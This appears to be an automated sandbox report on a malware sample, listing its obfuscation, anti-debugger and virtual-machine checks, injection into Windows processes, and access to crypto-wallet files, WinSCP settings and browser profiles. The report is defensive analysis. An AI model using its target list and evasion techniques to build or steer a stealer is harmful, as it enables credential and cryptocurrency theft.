Source: Binary string: ntdll.pdbUGP source: dialer.exe, 00000005.00000003.1933919289.0000000004DA0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1933537331.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: dialer.exe, 00000005.00000003.1934155632.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934298926.0000000004D50000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: win32u.pdb source: wmplayer.exe, wmplayer.exe, 00000010.00000003.2232497816.0000020343550000.00000004.00000001.00020000.00000000.sdmp, wmplayer.exe, 00000010.00000003.2232660082.0000020343580000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernel32.pdbUGP source: dialer.exe, 00000005.00000003.1934515258.0000000004CD0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934457085.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wkernelbase.pdbUGP source: dialer.exe, 00000005.00000003.1934634916.0000000004BB0000.00000004.00000001.00020000.00000000.sdmp, dialer.exe, 00000005.00000003.1934769024.0000000004DD0000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: win32u.pdbGCTL source: wmplayer.exe, 00000010.00000003.2232497816.0000020343550000.00000004.00000001.00020000.00000000.sdmp, wmplayer.exe, 00000010.00000003.2232660082.0000020343580000.00000004.00000001.00020000.00000000.sdmp

Data Obfuscation

Source: 15.3.OpenWith.exe.1f0d742aad0.19.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.19.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.14.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.14.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.24.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.24.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 15.2.OpenWith.exe.1f0d7609d60.1.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.2.OpenWith.exe.1f0d7609d60.1.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.11.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.11.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.20.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.20.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.27.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.27.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d7609d60.30.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d7609d60.30.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.1.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.1.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.10.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.10.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.5.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.5.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: 15.3.OpenWith.exe.1f0d742aad0.6.raw.unpack, Runtime.cs .Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
Source: 15.3.OpenWith.exe.1f0d742aad0.6.raw.unpack, Runtime.cs .Net Code: CoreMain
Source: C:\Users\user\Desktop\nF54KOU30R.exe Code function: 0_3_03D6FF22 push edi; iretd 0_3_03D6FF2D
Source: C:\Users\user\Desktop\nF54KOU30R.exe Code function: 0_3_03D68964 push ebx; retf 0_3_03D68965
Source: C:\Users\user\Desktop\nF54KOU30R.exe Code function: 0_3_03D6750E push ds; iretd 0_3_03D67517
Source: C:\Users\user\Desktop\nF54KOU30R.exe Code function: 0_3_03D694E9 push cs; retf 0_3_03D69565
Source: C:\Windows\SysWOW64\dialer.exe Code function: 5_3_025D3E4E push edi; iretd 5_3_025D3E55
Source: C:\Windows\SysWOW64\dialer.exe Code function: 5_3_025D5CD2 push dword ptr [edx+ebp+3Bh]; retf 5_3_025D5CDF
Source: C:\Windows\SysWOW64\dialer.exe Code function: 5_3_025D3B74 pushad ; retf 5_3_025D3B83
Source: C:\Windows\SysWOW64\dialer.exe Code function: 5_3_025D4305 push F693B671h; retf 5_3_025D430A
Source: C:\Windows\SysWOW64\dialer.exe Code function: 5_3_025D0FCE push eax; retf 5_3_025D0FCF
Source: C:\Windows\SysWOW64\dialer.exe Code function: 5_3_025D4FC8 push es; ret 5_3_025D4FC9
Source: C:\Windows\SysWOW64\dialer.exe Code function: 5_3_025D45FC push esi; ret 5_3_025D4600
Source: C:\Windows\SysWOW64\dialer.exe Code function: 5_3_025D21EF push ecx; iretd 5_3_025D21FB
Source: C:\Windows\SysWOW64\dialer.exe Code function: 5_3_025D21AF pushad ; ret 5_3_025D21B7
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5749D1E push esi; retf 000Ah 15_3_00007DF4E5749D1F
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5744CA0 push edx; ret 15_3_00007DF4E5744CAB
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5A0DDD push edx; iretd 17_2_000001D3CF5A0DDE
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5A0314 push ecx; iretd 17_2_000001D3CF5A0316
Source: C:\Windows\System32\dllhost.exe Code function: 17_2_000001D3CF5A0922 push es; ret 17_2_000001D3CF5A0925
Source: C:\Users\user\Desktop\nF54KOU30R.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\dialer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\OpenWith.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\wmplayer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files\Windows Media Player\wmplayer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\dllhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\System32\dllhost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: dialer.exe, 00000005.00000002.1994750367.0000000002CF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OLLYDBG.EXE
Source: dialer.exe, 00000005.00000002.1994750367.0000000002CF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: X64DBG.EXE
Source: dialer.exe, 00000005.00000002.1994750367.0000000002CF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: EVERYWHERE.EXEFIDDLER.EXEIDA.EXEIDA64.EXEIMMU""
Source: dialer.exe, 00000005.00000002.1994750367.0000000002CF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: FIDDLER.EXE
Source: dialer.exe, 00000005.00000002.1994750367.0000000002CF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MP.EXEX64DBG.EXEX32DBG.EXEOLLYDBG.EXEPROCESSHA
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E573AC1C str word ptr [eax-75h] 15_3_00007DF4E573AC1C
Source: C:\Windows\System32\dllhost.exe Code function: GetAdaptersInfo, 17_2_000001D3CF5A2AC4
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\SysWOW64\dialer.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E5758E20 GetLogicalDriveStringsW, 15_3_00007DF4E5758E20
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E57B7344 GetSystemInfo, 15_3_00007DF4E57B7344
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization\TrainedDataStore
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft\InputPersonalization
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\Default\AppData\Local\Microsoft
Source: wmplayer.exe, 00000010.00000002.2882270249.00000203433F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWpMAC
Source: dialer.exe, 00000005.00000002.1994333377.0000000002978000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWx
Source: OpenWith.exe, 0000000F.00000003.2079140690.000001F0D7399000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkmbolicLinkSymbolicLink
Source: OpenWith.exe, 0000000F.00000003.2079140690.000001F0D7399000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkLinkcLinkSymbolicLink
Source: dialer.exe, 00000005.00000002.1994333377.0000000002978000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: OpenWith.exe, 0000000F.00000003.2042892302.000001F0D743A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMCIDevSymbolf
Source: wmplayer.exe, 00000010.00000002.2882270249.00000203433F7000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWQ
Source: dialer.exe, 00000005.00000003.1934769024.0000000004DD0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: DisableGuestVmNetworkConnectivity
Source: nF54KOU30R.exe, 00000000.00000002.1982036347.0000000000F9E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW O
Source: nF54KOU30R.exe, 00000000.00000003.1916214760.0000000001000000.00000004.00000020.00020000.00000000.sdmp, nF54KOU30R.exe, 00000000.00000002.1982141598.0000000001000000.00000004.00000020.00020000.00000000.sdmp, dialer.exe, 00000005.00000002.1994333377.0000000002978000.00000004.00000020.00020000.00000000.sdmp, OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000010.00000002.2882270249.00000203433F7000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000011.00000002.2881521633.000001D3CF5FB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: OpenWith.exe, 0000000F.00000003.2075439224.000001F0D7372000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_disk#4&1656f219&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}SymbolicLinkymbolicLinkcLinkSymbolicLinkY
Source: dialer.exe, 00000005.00000003.1934769024.0000000004DD0000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: EnableGuestVmNetworkConnectivity
Source: OpenWith.exe, 0000000F.00000003.2116414121.000001F0D737A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#Disk&Ven_VMware&Prod_Virtual_die
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\nF54KOU30R.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\nF54KOU30R.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process queried: DebugPort
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\nF54KOU30R.exe Code function: 0_3_03DB22CC VirtualAlloc,VirtualAlloc,VirtualProtect,LdrInitializeThunk,VirtualFree, 0_3_03DB22CC
Source: C:\Users\user\Desktop\nF54KOU30R.exe Code function: 0_3_03DB2277 mov eax, dword ptr fs:[00000030h] 0_3_03DB2277
Source: C:\Windows\SysWOW64\dialer.exe Code function: 5_3_025D027F mov eax, dword ptr fs:[00000030h] 5_3_025D027F
Source: C:\Windows\System32\OpenWith.exe Code function: 15_2_000001F0D53B1A90 NtAcceptConnectPort,NtAcceptConnectPort,RtlAddVectoredExceptionHandler, 15_2_000001F0D53B1A90

HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\nF54KOU30R.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 protect: page execute and read and write
Source: C:\Program Files\Windows Media Player\wmplayer.exe Memory allocated: C:\Windows\System32\dllhost.exe base: 1D3CF5A0000 protect: page read and write
Source: C:\Users\user\Desktop\nF54KOU30R.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\nF54KOU30R.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 400000
Source: C:\Users\user\Desktop\nF54KOU30R.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 401000
Source: C:\Users\user\Desktop\nF54KOU30R.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 452000
Source: C:\Users\user\Desktop\nF54KOU30R.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 462000
Source: C:\Users\user\Desktop\nF54KOU30R.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 46A000
Source: C:\Users\user\Desktop\nF54KOU30R.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 46B000
Source: C:\Users\user\Desktop\nF54KOU30R.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 46C000
Source: C:\Users\user\Desktop\nF54KOU30R.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 877008
Source: C:\Program Files\Windows Media Player\wmplayer.exe Memory written: C:\Windows\System32\dllhost.exe base: 1D3CF5A0000
Source: C:\Program Files\Windows Media Player\wmplayer.exe Memory written: C:\Windows\System32\dllhost.exe base: 7FF70F3314E0
Source: C:\Users\user\Desktop\nF54KOU30R.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Process created: C:\Windows\SysWOW64\dialer.exe "C:\Windows\system32\dialer.exe"
Source: C:\Windows\SysWOW64\dialer.exe Process created: C:\Windows\System32\OpenWith.exe "C:\Windows\system32\openwith.exe"
Source: C:\Windows\System32\OpenWith.exe Process created: C:\Program Files\Windows Media Player\wmplayer.exe "C:\Program Files\Windows Media Player\wmplayer.exe"
Source: C:\Program Files\Windows Media Player\wmplayer.exe Process created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
Source: C:\Windows\System32\OpenWith.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Windows\System32\OpenWith.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Media Player\wmplayer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files\Windows Media Player\wmplayer.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\dllhost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\OpenWith.exe Code function: 15_3_00007DF4E574F83C CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe, 15_3_00007DF4E574F83C
Source: C:\Users\user\Desktop\nF54KOU30R.exe Code function: 0_2_009C4675 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_009C4675
Source: C:\Windows\System32\OpenWith.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: dialer.exe, 00000005.00000002.1994750367.0000000002CF0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OllyDbg.exe

Stealing of Sensitive Information

Source: Yara match File source: 00000005.00000003.1932913014.0000000002CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.1959663003.0000000004B25000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2040046946.000001F0D75C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.2320123910.000001F0D77C1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.1935862914.0000000003720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1978957383.0000000003F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1982803526.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1994856642.0000000004310000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: OpenWith.exe, 0000000F.00000003.2079637788.000001F0D7399000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\Qtum-Electrum\config
Source: OpenWith.exe, 0000000F.00000003.2078385188.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\ElectronCash\config
Source: OpenWith.exe, 0000000F.00000003.2077419633.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\com.liberty.jaxx
Source: OpenWith.exe, 0000000F.00000003.2081933128.000001F0D7444000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Local\Exodus\exodus.wallet
Source: OpenWith.exe, 0000000F.00000003.2081434576.000001F0D7371000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: passphrase.json
Source: OpenWith.exe, 0000000F.00000003.2107739996.000001F0D7435000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: !%LOCALAPPDATA%\Ethereum\keystore\
Source: OpenWith.exe, 0000000F.00000003.2081933128.000001F0D7444000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Local\Exodus\exodus.wallet
Source: OpenWith.exe, 0000000F.00000003.2107739996.000001F0D7435000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Ethereum
Source: OpenWith.exe, 0000000F.00000003.2078385188.000001F0D73C5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %AppData%\Coinomi\Coinomi\wallets
Source: OpenWith.exe, 0000000F.00000003.2107739996.000001F0D7435000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: !%LOCALAPPDATA%\Ethereum\keystore\
Source: OpenWith.exe, 0000000F.00000002.2320949887.000001F0D5588000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Bitcoin\Bitcoin-Qt
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-core
Source: C:\Windows\System32\OpenWith.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Configuration\Security
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64f Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings\main\ms-language-packs\browser\newtab Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\settings Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\z6bny8rn.default Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB Jump to behavior
Source: C:\Windows\System32\OpenWith.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files Jump to behavior
